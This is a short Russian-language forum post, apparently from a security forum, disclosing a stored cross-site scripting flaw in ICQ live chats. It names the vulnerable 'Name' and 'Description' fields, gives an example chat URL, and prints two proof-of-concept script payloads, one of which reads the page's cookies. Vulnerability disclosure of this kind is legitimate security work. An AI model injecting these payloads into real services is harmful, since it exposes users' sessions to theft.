Тема: XSS icq.com
Показать сообщение отдельно

  #3  
Старый 14.02.2016, 21:06
Poltergeist
Познающий
Регистрация: 22.06.2010
Сообщений: 52
С нами: 8363126

Репутация: 9
По умолчанию

Stored XSS в ICQ лайвчатах. Пример:

Код:
https://icq.com/chat/AqGIzmxQTeANPGrCCw
Уязвимы поля "Имя" и "Описание".

Код HTML:
">alert(document.cookie)
">alert("Stored XSS")
Лайвчат можно создать через приложение для iOS или Android.
 
Ответить с цитированием